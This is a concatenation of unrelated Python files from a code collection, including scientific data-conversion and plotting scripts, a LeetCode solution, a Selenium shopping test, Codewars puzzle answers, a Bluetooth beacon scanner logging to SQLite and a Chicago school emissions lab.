            words : whitespace-separated query string.
            vis : if True, print every matching record.
        return:
            list of matching record indices (unordered).
        """
        result_set = set()
        for word in words.split():
            word = self._CLEAN_PATTERN.sub('', word).lower()
            if word in self.inverted_idx:
                result_set.update(self.inverted_idx[word])
        if vis:
            for idx in result_set:
                print(self.word_lst[idx])
        return list(result_set)

    def get_inverted_idx(self):
        """Return the underlying word -> set(indices) mapping."""
        return self.inverted_idx
| true |
b89e0be3bb1597a95716fe5f194fef0a94df6255 | Python | ewhuang/pacer | /ensg_to_hgnc_conversion.py | UTF-8 | 3,552 | 2.734375 | 3 | [] | no_license | ### Author: Edward Huang
from collections import OrderedDict
import numpy as np
### This script converts the new auc file for drug response in patients to the
### old format that the Mayo data used. Also converts the gene expression table
### to the old format. Lastly, converts the LINCS level 4 data to the old
### format.
if __name__ == '__main__':
    # Pipeline: translate CTRP-style ids, aggregate drug-response AUCs into a
    # drug x cell-line table, then re-order the gene-expression table to the
    # same cell-line columns. All paths are relative to ./data/.
    # Read in the cell line translation information.
    f = open('./data/cell_line.txt', 'r')
    # Keys are ccl_id's, values are the ccl_names.
    ccl_id_to_name = {}
    for i, line in enumerate(f):
        if i == 0:
            continue
        line = line.split()
        # Skip a line if it doesn't have a translation.
        if len(line) == 1:
            continue
        ccl_name, ccl_id = line
        ccl_id_to_name[ccl_id] = ccl_name
    f.close()
    # Read in the drug translation information.
    f = open('./data/drug.txt', 'r')
    # Keys are master_cpd_id, values are broad_cpd_id.
    master_cpd_to_broad = {}
    for i, line in enumerate(f):
        if i == 0:
            continue
        master_cpd_id, broad_cpd_id = line.split()
        master_cpd_to_broad[master_cpd_id] = broad_cpd_id
    f.close()
    # Read in the raw drug response data, and construct the corresponding
    # dictionary.
    ccl_lst = []
    drug_resp_dct = OrderedDict({})
    f = open('./data/auc.txt', 'r')
    for i, line in enumerate(f):
        if i == 0:
            continue
        experiment_id, auc, master_cpd_id, ccl_id = line.split()
        # Translate the drug id's and the ccl id's.
        drug_id = master_cpd_to_broad[master_cpd_id]
        # Insert values into drug response dictionary.
        if drug_id not in drug_resp_dct:
            drug_resp_dct[drug_id] = OrderedDict({})
        # Skip cancer cell lines not in our dictionary.
        if ccl_id not in ccl_id_to_name:
            continue
        ccl_name = ccl_id_to_name[ccl_id]
        if ccl_name not in ccl_lst:
            ccl_lst += [ccl_name]
        auc = float(auc)
        # Multiple experiments per (drug, cell line) are collected and
        # averaged at write-out time below.
        if ccl_name in drug_resp_dct[drug_id]:
            drug_resp_dct[drug_id][ccl_name] += [auc]
        else:
            drug_resp_dct[drug_id][ccl_name] = [auc]
    f.close()
    # Write out to our old format for drug response.
    out = open('./data/auc_hgnc.tsv', 'w')
    out.write('exposure\t' + '\t'.join(ccl_lst) + '\n')
    for drug in drug_resp_dct:
        out.write(drug)
        for ccl in ccl_lst:
            if ccl not in drug_resp_dct[drug]:
                out.write('\tNA')
            else:
                out.write('\t%f' % np.mean(drug_resp_dct[drug][ccl]))
        out.write('\n')
    out.close()
    f = open('./data/gene_expression.txt', 'r')
    out = open('./data/gene_expression_hgnc.tsv', 'w')
    # Gene expression cancer cell lines.
    for i, line in enumerate(f):
        if i == 0:
            # Header row: compute the column permutation (ge_indices) that
            # re-orders expression columns to match ccl_lst.
            out.write('gid\t')
            ge_ccl = line.split()[2:]
            assert len(set(ccl_lst).difference(ge_ccl)) == 0
            ge_indices = [ge_ccl.index(cl) for cl in ccl_lst]
            ge_ccl = [ge_ccl[i] for i in ge_indices]
            out.write('\t'.join(ge_ccl) + '\n')
            continue
        line = line.split()[1:]
        gene_id, cell_lines = line[0], line[1:]
        # Only rows whose gene id is NOT numeric (i.e. HGNC symbols) are kept.
        try:
            float(gene_id)
        except ValueError:
            # Remove cell lines that don't appear in the drug response.
            cell_lines = [cell_lines[i] for i in ge_indices]
            out.write(gene_id + '\t' + '\t'.join(cell_lines) + '\n')
    f.close()
    out.close()
b432a9723adf994533ed1bba53f318b62834a3d2 | Python | bobovnii/Stau | /NTupleMaker/test/DatacardProducer/ratioPlotSyst.py | UTF-8 | 5,023 | 2.640625 | 3 | [] | no_license | ######################################################################################
# Script to plot the central, up and down distributions #
# for each MC process and syst uncertainty. #
# The lower pad plots the ratios. #
# It is meant to run on ROOT files produced by the datacardProducer.py script #
# #
# Please adjust #
# - Input directory (indir) #
# - Output directory where to save plots (plotOutDir) #
# - Dict with input ROOT files and variable name (varDict) #
# - The name of the categories and systematics (cat, systName) #
# #
# Input argument: channel (et or mt) #
# To run, e.g.: #
# python ratioPlotSyst.py mt #
# #
######################################################################################
import os, sys, ROOT
from ROOT import *
def setOutputName(dirName, catName, mcName, systName, varName):
    """Build '<dir>/<cat>_<mc>_<syst>_<var>' — the per-plot file stem."""
    return "%s/%s_%s_%s_%s" % (dirName, catName, mcName, systName, varName)
def makeRatioPlot(hcentr, hup, hdown, dirName, catName, mcName, systName, varName):
    # Draw central / syst-up / syst-down histograms in a top pad and their
    # ratios to the central histogram in a bottom pad; save the canvas as a
    # PNG named by setOutputName.
    c = TCanvas("c"+varName+"_"+catName+"_"+mcName+"_"+systName, "c"+varName+"_"+catName+"_"+mcName+"_"+systName, 600,700)
    topPad = TPad("top","top",0, 0.3, 1,1)
    topPad.SetBottomMargin(0)
    topPad.Draw()
    topPad.cd()
    hcentr.SetTitle(varName + " in " +catName+": "+mcName+" "+systName)
    hcentr.Draw()
    hup.Draw("same")
    hdown.Draw("same")
    # styling: central = black dots, up = blue triangles, down = red triangles
    hcentr.SetLineColor(kBlack)
    hcentr.SetMarkerStyle(20)
    hcentr.SetMarkerSize(0.7)
    hcentr.SetMarkerColor(kBlack)
    hup.SetLineColor(kBlue)
    hup.SetMarkerStyle(22)
    hup.SetMarkerSize(0.7)
    hup.SetMarkerColor(kBlue)
    hdown.SetLineColor(kRed)
    hdown.SetMarkerStyle(23)
    hdown.SetMarkerSize(0.7)
    hdown.SetMarkerColor(kRed)
    hup.SetStats(0)
    hdown.SetStats(0)
    hcentr.SetStats(0)
    leg = TLegend(0.6, 0.7, 0.9, 0.9)
    leg.AddEntry(hcentr, "central", "lp")
    leg.AddEntry(hup, "syst Up","lp")
    leg.AddEntry(hdown, "syst Down","lp")
    leg.Draw()
    c.cd()
    downPad = TPad("down","down",0,0,1,0.3)
    downPad.SetTopMargin(0)
    downPad.Draw()
    downPad.cd()
    #making clones before dividing
    hdown_c = hdown.Clone("")
    hup_c = hup.Clone("")
    hcentr_c = hcentr.Clone("")
    hup_c.SetStats(0)
    hdown_c.SetStats(0)
    hcentr_c.SetStats(0)
    # ratio pad: each variation divided by the central histogram
    # (hcentr_c / hcentr is the flat reference line at 1)
    hup_c.Divide(hcentr_c)
    hup_c.SetAxisRange(0.,2.,"Y")
    hup_c.Draw("e")
    hdown_c.Divide(hcentr)
    hdown_c.Draw("eSAME")
    hcentr_c.Divide(hcentr)
    hcentr_c.Draw("eSAME")
    hup_c.SetTitle("")
    c.Update()
    oname = setOutputName(dirName, catName, mcName, systName, varName)
    c.SaveAs(oname+".png")
    #delete objects (maybe not needed)
    hdown_c.Delete()
    hup_c.Delete()
    hcentr_c.Delete()
#######################
# beginning of "main" #
#######################
ROOT.TH1.SetDefaultSumw2(kTRUE)
channel = sys.argv[1]
# directory with input ROOT file
indir = "/nfs/dust/cms/user/bottav/CMSSW_8_0_25/src/DesyTauAnalyses/NTupleMaker/test/DatacardProducer/"
#specify here (varDict) the name of the input ROOT file (datacard file with systematic variations) and name of the variable (eg: "mvis", "msv", ..)
varDict = {"bin": "cuts_mt_nominal_mt_nominal_htt_mt.inputs-sm-13TeV-mvis.root"}
#mcProc = ["ZTT","ZL","ZJ","TTJ","TTT","W","VV","QCD"]
mcProc = ["ZL"]
#directory for plots
plotOutDir = "."
#systematics to include and cathegories for each channel
#Must match the names in the input ROOT file
if channel == "et":
cat = ["et_inclusive", "et_inclusivemt40"]
systName = ["_CMS_scale_t_13TeV","_topPtWeight","_CMS_scale_eEB_13TeV", "_CMS_scale_eEE_13TeV"]
if channel == "mt":
#cat = ["mt_boosted", "mt_0jet", "mt_vbf"]
cat = ["mt_0jet"]
#systName = ["_CMS_scale_t_1prong_13TeV","_CMS_scale_t_3prong_13TeV", "_CMS_scale_t_1prong1pizero_13TeV"]
systName = ["_CMS_mFakeTau_1prong_13TeV", "_CMS_mFakeTau_1prong1pizero_13TeV", "_CMS_ZLShape_mt_0jet_1prong_13TeV", "_CMS_ZLShape_mt_0jet_1prong1pizero_13TeV"]
else:
print "invalid channel choice"
for varName, varFile in varDict.iteritems():
inFile = TFile(indir+varFile,"read")
#loop on file folders
for aCat in cat:
print "Category ", aCat
#define totMC histos
h_totMC_centr = TH1F()
h_totMC_up = TH1F()
h_totMC_down = TH1F()
#loop on MC processes
for MCname in mcProc:
#take histos
print "Getting ", aCat+"/"+MCname
hCentral = inFile.Get(aCat+"/"+MCname)
h_totMC_centr.Add(hCentral)
for aSyst in systName:
print "Getting ", aCat+"/"+MCname+aSyst+"Down"
hDown = inFile.Get(aCat+"/"+MCname+aSyst+"Down")
h_totMC_down.Add(hDown)
print "Getting ", aCat+"/"+MCname+aSyst+"Up"
hUp = inFile.Get(aCat+"/"+MCname+aSyst+"Up")
h_totMC_up.Add(hUp)
#make ratios for each MC process, each systematic
makeRatioPlot(hCentral, hUp, hDown, plotOutDir, aCat, MCname, aSyst, varName)
#make ratio plot of total MC, all syst up and all down
makeRatioPlot(h_totMC_centr, h_totMC_up, h_totMC_down, plotOutDir, aCat, "allMC", "allSyst",varName)
inFile.Close()
| true |
30bbf1c6f184ee2a9a99d92529d37ff0c24a6686 | Python | primus2019/mini-project | /utils/Plots.py | UTF-8 | 2,097 | 2.59375 | 3 | [] | no_license | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from .EDA import feature_VIF
def correlationPlot(ds, features, savefig, title=None):
    """Save a lower-triangle heatmap of pairwise correlations.

    ds : DataFrame; features : list of column names, or 'all';
    savefig : output image path; title : optional plot title.

    Fix: ``np.bool`` was removed from NumPy (1.24+); the builtin ``bool``
    dtype is the documented replacement.
    """
    features = ds.columns.values.tolist() if features == 'all' else features
    corr = ds.loc[:, features].corr()
    # mask the redundant upper triangle of the symmetric matrix
    mask = np.zeros_like(corr, dtype=bool)  # was np.bool (removed in NumPy >= 1.24)
    mask[np.triu_indices_from(mask)] = True
    f, ax = plt.subplots(figsize=(24, 20))
    cmap = sns.diverging_palette(220, 10, as_cmap=True)
    sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,
                square=True, linewidths=.5, cbar_kws={"shrink": .5})
    if title:
        plt.title(title)
    plt.savefig(savefig)
def vifPlot(ds, features, savefig, title=None):
    """Save a lower-triangle heatmap of pairwise VIF values.

    For every ordered pair of distinct features, computes the variance
    inflation factor via EDA.feature_VIF and plots the matrix.

    Fix: ``np.bool`` was removed from NumPy (1.24+); the builtin ``bool``
    dtype is the documented replacement.
    """
    features = ds.columns.values.tolist() if features == 'all' else features
    vif = pd.DataFrame(np.zeros((ds.shape[1], ds.shape[1])), index=ds.columns.values, columns=ds.columns.values)
    for f1 in features:
        for f2 in features:
            if f1 != f2:
                # NOTE: computes both (f1, f2) and (f2, f1) even though only
                # the lower triangle is displayed — kept for behavior parity
                temp_vif = feature_VIF(ds, features=[f1, f2]).values.tolist()[0][0]
                vif.loc[f1, f2] = temp_vif
    mask = np.zeros_like(vif, dtype=bool)  # was np.bool (removed in NumPy >= 1.24)
    mask[np.triu_indices_from(mask)] = True
    f, ax = plt.subplots(figsize=(24, 20))
    cmap = sns.diverging_palette(220, 10, as_cmap=True)
    sns.heatmap(vif, mask=mask, cmap=cmap, robust=True, center=0,
                square=True, linewidths=.5, cbar_kws={"shrink": .5})
    if title:
        plt.title(title)
    plt.savefig(savefig)
def jointPlot(ds, f1, f2, savefig, title='default', logarithmic=False):
    """Save a seaborn joint plot of columns *f1* vs *f2* of DataFrame *ds*.

    logarithmic=True switches from a hexbin plot to a regression plot and
    forwards ``logx`` (presumably a log-x regression fit — confirm against
    seaborn's jointplot/regplot documentation). The *title* parameter is
    currently unused: the title-setting code below is commented out.
    """
    sns.set(style="ticks")
    if logarithmic:
        p = sns.jointplot(ds[[f1]], ds[[f2]], kind="reg", color="#4CB391", logx=logarithmic)
        # p.ax_joint.set_xscale('log')
        # p.ax_joint.set_yscale('log')
    else:
        p = sns.jointplot(ds[[f1]], ds[[f2]], kind="hex", color="#4CB391")
    # if title == 'default':
    #     title = 'Marginal distributions between {} and {}'.format(f1, f2)
    # plt.title(title)
    plt.savefig(savefig)
| true |
752bd5e6cc99f72c6814537c118c9ff58134757a | Python | lucaschen321/leetcode | /python/p0424-longest-repeating-character-replacement/p0424-longest-repeating-character-replacement.py | UTF-8 | 1,078 | 3.640625 | 4 | [
"MIT"
] | permissive | from collections import defaultdict
class Solution:
    def characterReplacement(self, s: str, k: int) -> int:
        """Length of the longest substring that can be made uniform with at
        most *k* character replacements (LeetCode 424, sliding window).

        Fix: the original returned 0 for any single-character string
        (e.g. s="A", k=0 -> 0 instead of 1) because its window started at
        right=1 and the answer was only updated inside the loop. This is
        the standard O(n) window: grow on the right, shrink from the left
        whenever the window needs more than k replacements.
        """
        counts = defaultdict(int)
        max_run = 0   # highest single-character count seen in any window
        best = 0
        left = 0
        for right, ch in enumerate(s):
            counts[ch] += 1
            max_run = max(max_run, counts[ch])
            # shrink until the window can be fixed with <= k replacements
            # (max_run is not decreased here: a stale value only makes the
            # window conservative, never too long)
            while (right - left + 1) - max_run > k:
                counts[s[left]] -= 1
                left += 1
            best = max(best, right - left + 1)
        return best
| true |
38d76130202cfd90e8de51c59a628bc9acb4b92c | Python | Dhanush33324/Python_Pytest_Demo | /Scenario 1.py | UTF-8 | 2,000 | 2.5625 | 3 | [] | no_license | from selenium import webdriver
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.wait import WebDriverWait
# End-to-end checkout flow on the Selenium practice shop: search for an item,
# add it to the cart, verify the cart total, then place the order.
driver = webdriver.Chrome("./chromedriver")
driver.get("https://rahulshettyacademy.com/seleniumPractise/#/")
search_item = "Apple"
driver.find_element_by_xpath("//input[@placeholder='Search for Vegetables and Fruits']").send_keys(search_item)
driver.find_element_by_xpath("//button[@class='search-button']").click()
driver.find_element_by_xpath(f"//h4[text()='{search_item} - 1 Kg']/..//a[@class='increment']").click()
driver.find_element_by_xpath(f"//h4[text()='{search_item} - 1 Kg']/..//button[text()='ADD TO CART']").click()
# open the cart / proceed to checkout (the pair is repeated three times in
# the original flow; kept as-is)
driver.find_element_by_xpath("//img[@alt='Cart']").click()
driver.find_element_by_xpath("//button[text()='PROCEED TO CHECKOUT']").click()
driver.find_element_by_xpath("//img[@alt='Cart']").click()
driver.find_element_by_xpath("//button[text()='PROCEED TO CHECKOUT']").click()
# fix: the next two statements were fused onto a single line in the source
# (a syntax error); split back into separate statements
driver.find_element_by_xpath("//img[@alt='Cart']").click()
driver.find_element_by_xpath("//button[text()='PROCEED TO CHECKOUT']").click()
wait = WebDriverWait(driver, 10)
wait.until(expected_conditions.visibility_of_element_located(("xpath", "//button[text()='Place Order']")))
# every second <p class='amount'> holds a line total; sum them up
amounts = driver.find_elements_by_xpath("//p[@class='amount']")
a = []
for index, amount in enumerate(amounts):
    print(index)
    if index % 2 != 0:
        print(int(amount.text))
        a.append(int(amount.text))
total = sum(a)
# place the order only when the displayed total matches our own sum
if int(driver.find_element_by_xpath("//span[@class='discountAmt']").text) == total:
    driver.find_element_by_xpath("//button[text()='Place Order']").click()
select = Select(driver.find_element_by_xpath("//option[text()='Select']"))
select.select_by_visible_text("India")
driver.find_element_by_xpath("//input[@type='checkbox']").click()
driver.find_element_by_xpath("//button[text()='Proceed']").click()
# TODO: locator missing — find_element_by_xpath() requires an xpath argument;
# as written this line raises TypeError at runtime
Successful_message = driver.find_element_by_xpath()
| true |
a41fca7d8eee1fb49cafbeca0b1b1265dd30914a | Python | Artem-Efremov/CodeWars | /Strings/6kyu_Scooby Doo Puzzle.py | UTF-8 | 4,256 | 3.765625 | 4 | [] | no_license | """
Introduction
Good one Shaggy! We all love to watch Scooby Doo, Shaggy Rogers, Fred Jones, Daphne Blake and Velma Dinkley solve the clues and figure out who was the villain. The story plot rarely differed from one episode to the next. Scooby and his team followed the clue then unmasked the villain at the end.
Scooby Doo
Task
Your task is to initially solve the clues and then use those clues to unmask the villain. You will be given a string of letters that you must manipulate in a way that the clues guide you. You must then output the villain.
You will be given an Array of potential villains and you must only return the correct masked villain.
Potential Villains for the example test cases
Black Knights, Puppet Master, Ghost Clowner, Witch Doctors, Waxed Phantom, Manor Phantom, Ghost Bigfoot, Haunted Horse, Davy Crockett, Captain Injun, Greens Gloobs, Ghostly Manor, Netty Crabbes, King Katazuma, Gators Ghouls, Headless Jack, Mambas Wambas, Medicines Man, Demon Sharker, Kelpy Monster, Gramps Vamper, Phantom Racer, Skeletons Men, Moon Monsters
There will be different villains for the main test cases!
Clue 1: The first clue is in a 'house' on 'String Class' Avenue.
Good luck!
"""
# Clue 1: The first clue is in a 'house' on 'String Class' Avenue.
# def scoobydoo(villian, villians):
# x = String()
# x.house()
# """
# Step 1: Rotate all letters to the right by 5
# Clue: You are close to the monster so you may need to create a 'Disguise'
# """
# # Step 2:
# def scoobydoo(villian, villians):
# x = Disguise()
# """
# Step 2: Reverse the whole string
# Clue: What is the length of Scooby Doo's favourite snack?
# Try using the answer in the Integer Class
# """
# # Step 3:
# def scoobydoo(villian, villians):
# x = Integer()
# """dog biscuit"""
# x.eleven()
"""
Step 3: Shift every even-positioned letter of the Villain's Name forward by 5, i.e. a => f
Make sure after the letter z it goes round to a
"""
def char_shift_a_z(char, shift=5):
    """Caesar-shift a lowercase letter, wrapping from z back around to a."""
    position = ord(char) - ord('a') + 1  # 1-based position in the alphabet
    return chr((position + shift) % 26 + 96)
def scoobydoo(villian, villians):
    """Decode a masked villain name and look it up in *villians*.

    Decoding: rotate right by 5, reverse, then shift every even-positioned
    letter forward by 5 (wrapping z -> a). The decoded text equals a villain
    name lowercased with its spaces removed.
    """
    normalized = [name.replace(' ', '').lower() for name in villians]
    lookup = dict(zip(normalized, villians))
    rotated = villian[-5:] + villian[:-5]        # rotate right by 5
    reverted = rotated[::-1]                     # reverse the whole string
    decoded_chars = []
    for position, ch in enumerate(reverted, start=1):
        if position % 2 == 0 and ch.isalpha():   # +5 on even positions only
            decoded_chars.append(chr((ord(ch) - 97 + 5) % 26 + 97))
        else:
            decoded_chars.append(ch)
    return lookup[''.join(decoded_chars)]
def scoobydoo(villian, villians):
    """Unmask the villain via a shortcut: every second character of the
    masked name read backwards appears, in order, among the even-indexed
    characters of the real (merged, lowercase) name."""
    clue = villian[-6:0:-2]
    matches = [name for name in villians if clue in name[::2]]
    return matches[0]
import random
def scoobydooreverse(villian):
    # Encoder: turns a plain villain name into its masked form (the inverse
    # of scoobydoo2's decoding). NOTE(review): relies on a global `shift`
    # helper that is not defined in this file (Codewars preloaded code?) —
    # verify before running standalone.
    villian = ''.join(villian.split(' ')).lower()
    badguy = ""
    num = 0
    for le in villian:
        num += 1
        if num % 2 == 0:
            # shift even-positioned letters back by 5 (f->a, ..., e->z)
            le = le.translate(str.maketrans('fghijklmnopqrstuvwxyzabcde','abcdefghijklmnopqrstuvwxyz'))
        badguy += le
    villian = badguy
    villian = villian[::-1]
    villian = ''.join(shift(villian, -5))
    return villian
def scoobydoo2(villian, villians):
    # Reference decoder: undoes scoobydooreverse step by step, then matches
    # the decoded text against the villain list (spaces removed, lowercased).
    # NOTE(review): depends on the same external `shift` helper as
    # scoobydooreverse; returns None when nothing matches.
    villian = villian.lower()
    villian = ''.join(shift(villian, 5))
    villian = villian[::-1]
    badguy = ""
    num = 0
    for le in villian:
        num += 1
        if num % 2 == 0:
            # shift even-positioned letters forward by 5 (a->f, ..., z->e)
            le = le.translate(str.maketrans('abcdefghijklmnopqrstuvwxyz','fghijklmnopqrstuvwxyzabcde'))
        badguy += le
    for bg in villians:
        if ''.join(bg.lower().split(' ')) == badguy: return bg
# Random round-trip check: encode a random villain with scoobydooreverse,
# then confirm scoobydoo agrees with the reference decoder scoobydoo2.
# `test` is the Codewars assertion framework object (not defined here).
letters = "abcdefghijklmnopqrstuvwxwz"  # NOTE(review): likely a typo — 'y' missing, 'w' doubled
for rtest in range(100):
    villians = []
    for le in range(20):
        vil = ""
        for le in range(20):
            vil += letters[random.randint(0,len(letters)-1)]
        villians.append(vil)
    n = random.randint(0,len(villians)-1)
    bb = scoobydooreverse(villians[n])
    solution = scoobydoo2(bb,villians)
    result = scoobydoo(bb,villians)
    test.it("Should return: "+solution)
    test.assert_equals(result, solution)
| true |
5aff677bbf36e68ff625f16c37ccef5c7c643cf3 | Python | DanielJBurbridge/Jetbrains-Academy | /Hyperskill/Python/Medium/Webscraper/Webscraper/1.0/scraper.py | UTF-8 | 293 | 3.09375 | 3 | [] | no_license | import requests
url = input("Input the URL:\n")
response = requests.get(url)
if response.status_code != 200:
    print("Invalid quote resource!")
else:
    payload = response.json()
    if 'content' in payload:
        print(payload.get('content'))
    else:
        print("Invalid quote resource!")
| true |
50b1e5e598ec042cd656526f3dcf585ae6e68a38 | Python | akiraboy/python_20191010 | /collections_tbier/zad_7.py | UTF-8 | 238 | 3.921875 | 4 | [] | no_license | napis = input("POdaj ciag znaków: ")
# count vowels in the user-provided string (napis is read just above)
samogloski = ['a', 'e', 'i', 'o', 'u', 'y']
ile_samoglosek = sum(1 for znak in napis if znak in samogloski)
print(f"Znaleziono samoglosek: {ile_samoglosek}")
30be00a608cfe4674ffbba5469ad8e9a554c0f06 | Python | git-metal/python-learn | /python-lib/Concurrent/test_threading.py | UTF-8 | 1,450 | 3.359375 | 3 | [] | no_license |
import threading
from time import ctime, sleep
class MyThread(threading.Thread):
    """Thread subclass that runs an arbitrary callable with fixed args."""

    def __init__(self, func, args, name=""):
        super(MyThread, self).__init__()
        self.func = func
        self.args = args
        self.name = name  # exposed via threading.Thread's name property

    def run(self):
        """Invoke the stored callable; executed by start() in the new thread."""
        print("run MyThread")
        self.func(*self.args)
def music(name):
    """Print a 'listening to *name*' message twice, one second apart."""
    for _ in range(2):
        print("I was listening to %s. %s" % (name, ctime()))
        sleep(1)
def move(name):
    """Print an 'at the *name*' message twice, one second apart."""
    for _ in range(2):
        print("I was at the %s! %s" % (name, ctime()))
        sleep(1)
def super_play(file, time):
    """Announce playback of *file* twice, pausing *time* seconds each round."""
    for _ in range(2):
        print('Start playing: %s! %s' % (file, ctime()))
        sleep(time)
if __name__ == "__main__":
    # Part 1: plain threading.Thread with target functions.
    threads = []
    t1 = threading.Thread(target=music, args=("光年之外",))
    threads.append(t1)
    t2 = threading.Thread(target=move, args=("正义联盟",))
    threads.append(t2)
    # test Thread function
    for t in threads:
        t.start()
    t1.join()
    t2.join()
    print("end: %s" % ctime())
    print(super_play.__name__)
    # test Thread Class
    # Part 2: the MyThread subclass; one thread per (file, duration) pair.
    in_list = {'光年之外': 3, '正义联盟': 5}
    threads = []
    for k, v in in_list.items():
        t = MyThread(super_play, (k, v), super_play.__name__)
        threads.append(t)
    for t in threads:
        t.start()
    # main thread waits 5 s instead of joining the workers
    sleep(5)
| true |
ce6a2a0741353d427a4dc4bead7f9dffa514191f | Python | lukaszmitka/beacon_detector | /scanner.py | UTF-8 | 2,472 | 2.6875 | 3 | [] | no_license | from bluepy.btle import Scanner, DefaultDelegate
import sqlite3
import datetime
class ScanDelegate(DefaultDelegate):
    # bluepy delegate: receives a callback for every BLE advertisement the
    # Scanner sees during scan(). (Python 2 print statements below.)
    def __init__(self):
        DefaultDelegate.__init__(self)
    def handleDiscovery(self, dev, isNewDev, isNewData):
        # isNewDev: address seen for the first time in this scan;
        # isNewData: a known device sent updated advertising data
        if isNewDev:
            print "Discovered device", dev.addr
        elif isNewData:
            print "Received new data from", dev.addr
def create_table(db_conn):
    """Ensure the Beacons table exists (one row per unique beacon address)."""
    ddl = "CREATE TABLE IF NOT EXISTS `Beacons` (id INTEGER PRIMARY KEY AUTOINCREMENT, address STRING NOT NULL, rssi REAL NOT NULL, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, UNIQUE(address));"
    cursor = db_conn.cursor()
    cursor.execute(ddl)
    db_conn.commit()
def update_device_status(db_conn, device_adress, rssi):
    """Insert the beacon if unseen, then refresh its rssi and updatedAt.

    Fix: uses parameterized SQL instead of string concatenation — the
    address comes from the radio (i.e. from outside the program), so it
    must never be spliced into the query text.
    """
    cursor = db_conn.cursor()
    time_now = datetime.datetime.now()
    cursor.execute(
        "INSERT OR IGNORE INTO `Beacons` (rssi, address, createdAt, updatedAt) VALUES(?, ?, ?, ?);",
        (rssi, device_adress, str(time_now), str(time_now)))
    cursor.execute(
        "UPDATE `Beacons` SET rssi = ?, updatedAt = ? WHERE address = ?;",
        (rssi, str(time_now), device_adress))
    db_conn.commit()
def delete_old_devices(db_conn, address_list):
    """Delete every `Beacons` row whose address is not in *address_list*.

    An empty *address_list* wipes the whole table (same as before). The SQL
    is now built from `?` placeholders instead of concatenating raw address
    strings, closing the SQL-injection hole.
    """
    cursor = db_conn.cursor()
    if address_list:
        placeholders = ", ".join("?" for _ in address_list)
        command = "DELETE FROM `Beacons` WHERE address NOT IN (%s);" % placeholders
        params = tuple(address_list)
    else:
        command = "DELETE FROM `Beacons`;"
        params = ()
    # print(...) with a single argument behaves the same on Python 2 and 3.
    print(command)
    cursor.execute(command, params)
    db_conn.commit()
# Wire the BLE scanner to the SQLite store, then poll forever:
# one 1-second scan per cycle, upserting every visible device and pruning
# rows for devices that went out of range.
scanner = Scanner().withDelegate(ScanDelegate())
conn = sqlite3.connect('beacon_detected.sqlite')
create_table(conn)
while 1:
    print "While loop"
    devices = scanner.scan(1.0)
    print "Detected devices %d" % (len(devices))
    print "%s" % (devices)
    addresses = list()
    for dev in devices:
        print "Device %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
        update_device_status(conn, dev.addr, dev.rssi)
        addresses.append(dev.addr)
    # Anything not seen in this cycle is removed from the table.
    delete_old_devices(conn, addresses)
    # for (adtype, desc, value) in dev.getScanData():
    # 	# print " %s = %s" % (desc, value)
    # 	a = desc
| true |
b4155ca142b910a4062222acc6a9b0557edc9d7c | Python | ibiehler/isabelleb | /Labs/School Greenhouse Gas Emissions/ghg_lab.py | UTF-8 | 4,281 | 3.796875 | 4 | [] | no_license |
'''
Greenhouse gas emissions (GHG) vs. square footage for all school buildings in Chicago
Data set used will be Chicago Energy Benchmark info from 2018
data can be found at...
https://data.cityofchicago.org/api/views/xq83-jr8c/rows.csv?accessType=DOWNLOAD
Energy Efficiency of Chicago Schools (35pts)
Chicago requires that all buildings over 50000 square feet in the city comply with energy benchmark reporting each year.
The dataset at the link above is that data from 2015 to 2018.
We will use this data to look at schools. We will visualize the efficiency of schools by scatter plot.
We expect that the more square footage (sqft) a school is, the more greenhouse gas (ghg) emission it will produce.
Challenge (for fun):
An efficient school would have a large ratio of sqft to ghg.
It would also be interesting to know where Parker lies on this graph??? Let's find out.
Make a scatterplot which does the following:
- Scatter plot the Total Greenhouse gas (GHG) Emmissions (y-axis), versus building square footage (x-axis) (10pts) *
- Data includes ONLY data for K-12 Schools. (5pts) *
- Data includes ONLY data for 2018 reporting. (5pts) *
- Label x and y axis and give appropriate title. (5pts) *
- Annotate Francis W. Parker. (5pts) *
- Create a best fit line for schools shown. (5pts) *
Extra Credit: Add a significant feature to your graph that helps tell the story of your data.
(feel free to use methods from matplotlib.org). (10pts)
Note: With extra credit you will earn you a max of 35pts (100%) for the assignment.
Maybe you can try one of the following or think up your own:
- Annotated labels (school name) for the 3 highest and 3 lowest GHG Intensities.
- Make schools in top 10 percent of GHG Intensity show in green.
- Make schools in bottom 10 percent GHG Intesity show in red.
- Add colleges and universities (use a different marker type)
Note 2: This is a tough assignment to do on your own. Do your best with what you have.
'''
import csv
import requests
import numpy as np
import matplotlib.pyplot as plt
def get_data(url):
    """Download *url* and return its body parsed as a list of CSV rows."""
    with requests.Session() as session:
        response = session.get(url)
        text = response.content.decode('utf-8')
    rows = csv.reader(text.splitlines(), delimiter=',')
    return list(rows)
# Fetch the full benchmarking dataset and locate the columns we need.
data = get_data("https://data.cityofchicago.org/api/views/xq83-jr8c/rows.csv?accessType=DOWNLOAD")
header = data.pop(0)
print(header)
ghg_index = header.index("Total GHG Emissions (Metric Tons CO2e)")
sqft_index = header.index("Gross Floor Area - Buildings (sq ft)")
type_index = header.index("Primary Property Type")
valid_ish_data = []
valid_data = []
# Keep K-12 schools whose GHG and sqft cells parse as integers; the bare
# except silently drops rows with blank/non-numeric cells (intentional filter).
for building in data:
    try:
        int(building[ghg_index])
        int(building[sqft_index])
        if building[type_index] == "K-12 School":
            valid_ish_data.append(building)
    except:
        pass
# Column 0 is the reporting year; restrict to the 2018 filings.
for section in valid_ish_data:
    if section[0] == "2018":
        valid_data.append(section)
print(valid_data)
ghg = [int(x[ghg_index]) for x in valid_data]
sqft = [int(x[sqft_index]) for x in valid_data]
plt.ylabel("Total Greenhouse Gas (GHG) Emmissions")
plt.xlabel("Building Square Footage")
plt.title("Energy Efficiency of Chicago Schools in 2018")
# annotation; Parker was not within the 2018 data so I annotated for Latin instead
schools = []
for school in valid_data:
    schools.append(school[2])
for i in range(len(schools)):
    if schools[i] == "Latin School of Chicago Upper School":
        plt.annotate(schools[i], xy=(sqft[i], ghg[i]), fontsize=5)
# best fit line
p = np.polyfit(sqft, ghg, 1) # (x, y, order) linear is 1st order
print(p)
x = [x for x in range(500000)]
y = [p[0] * y + p[1] for y in x] # linear first order
plt.plot(x, y)
